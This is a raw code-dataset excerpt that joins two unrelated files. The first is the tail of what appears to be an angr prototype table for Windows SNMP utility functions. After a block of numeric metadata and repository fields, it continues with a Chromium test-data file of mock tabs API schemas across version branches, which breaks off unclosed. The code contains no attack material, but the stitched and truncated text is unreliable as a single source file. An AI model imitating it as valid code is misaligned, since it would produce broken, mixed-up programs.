'SnmpUtilVarBindCpy': SimTypeFunction([SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVbDst", "pVbSrc"]),
#
'SnmpUtilVarBindFree': SimTypeFunction([SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pVb"]),
#
'SnmpUtilVarBindListCpy': SimTypeFunction([SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVblDst", "pVblSrc"]),
#
'SnmpUtilVarBindListFree': SimTypeFunction([SimTypePointer(SimStruct({"list": SimTypePointer(SimStruct({"name": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "value": SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None)}, name="SnmpVarBind", pack=False, align=None), offset=0), "len": SimTypeInt(signed=False, label="UInt32")}, name="SnmpVarBindList", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pVbl"]),
#
'SnmpUtilMemFree': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pMem"]),
#
'SnmpUtilMemAlloc': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["nBytes"]),
#
'SnmpUtilMemReAlloc': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["pMem", "nBytes"]),
#
'SnmpUtilOidToA': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypePointer(SimTypeChar(label="Byte"), offset=0), arg_names=["Oid"]),
#
'SnmpUtilIdsToA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeChar(label="Byte"), offset=0), arg_names=["Ids", "IdLength"]),
#
'SnmpUtilPrintOid': SimTypeFunction([SimTypePointer(SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["Oid"]),
#
'SnmpUtilPrintAsnAny': SimTypeFunction([SimTypePointer(SimStruct({"asnType": SimTypeChar(label="Byte"), "asnValue": SimUnion({"number": SimTypeInt(signed=True, label="Int32"), "unsigned32": SimTypeInt(signed=False, label="UInt32"), "counter64": SimTypeBottom(label="ULARGE_INTEGER"), "string": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "bits": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "object": SimStruct({"idLength": SimTypeInt(signed=False, label="UInt32"), "ids": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="AsnObjectIdentifier", pack=False, align=None), "sequence": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "address": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None), "counter": SimTypeInt(signed=False, label="UInt32"), "gauge": SimTypeInt(signed=False, label="UInt32"), "ticks": SimTypeInt(signed=False, label="UInt32"), "arbitrary": SimStruct({"stream": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "length": SimTypeInt(signed=False, label="UInt32"), "dynamic": SimTypeInt(signed=True, label="Int32")}, name="AsnOctetString", pack=False, align=None)}, name="<anon>", label="None")}, name="AsnAny", pack=False, align=None), offset=0)], SimTypeBottom(label="Void"), arg_names=["pAny"]),
#
'SnmpSvcGetUptime': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
#
'SnmpSvcSetLogLevel': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_LOG")], SimTypeBottom(label="Void"), arg_names=["nLogLevel"]),
#
'SnmpSvcSetLogType': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_OUTPUT_LOG_TYPE")], SimTypeBottom(label="Void"), arg_names=["nLogType"]),
#
'SnmpUtilDbgPrint': SimTypeFunction([SimTypeInt(signed=False, label="SNMP_LOG"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["nLogLevel", "szFormat"]),
}
lib.set_prototypes(prototypes)
| 397.445946
| 4,690
| 0.727109
| 3,240
| 29,411
| 6.583333
| 0.045062
| 0.180778
| 0.161463
| 0.199906
| 0.947586
| 0.946179
| 0.937318
| 0.924566
| 0.916315
| 0.913877
| 0
| 0.023936
| 0.069566
| 29,411
| 73
| 4,691
| 402.890411
| 0.755527
| 0.000952
| 0
| 0
| 0
| 0
| 0.224488
| 0.001534
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
310d6b0d97576ed0182b09e07b4e0b1f65009a5f
| 24,193
|
py
|
Python
|
chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
|
justremotephone/android_external_chromium_org
|
246856e61da7acf5494076c74198f2aea894a721
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-01-16T03:57:28.000Z
|
2021-01-23T15:29:45.000Z
|
chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
|
justremotephone/android_external_chromium_org
|
246856e61da7acf5494076c74198f2aea894a721
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/common/extensions/docs/server2/test_data/object_level_availability/tabs.py
|
justremotephone/android_external_chromium_org
|
246856e61da7acf5494076c74198f2aea894a721
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2015-04-17T13:19:09.000Z
|
2021-10-21T12:55:15.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from extensions_paths import CHROME_EXTENSIONS
from test_file_system import MoveAllTo
TABS_SCHEMA_BRANCHES = MoveAllTo(CHROME_EXTENSIONS, {
'trunk': {
'docs': {
'templates': {
'json': {
'api_availabilities.json': '{}'
}
}
},
'api': {
'_api_features.json': '{}',
'_manifest_features.json': '{}',
'_permission_features.json': '{}',
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {},
'fakeTabsProperty3': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1500': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1453': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1410': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1364': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1312': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1271': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1229': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1180': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1132': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1084': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1025': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'963': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
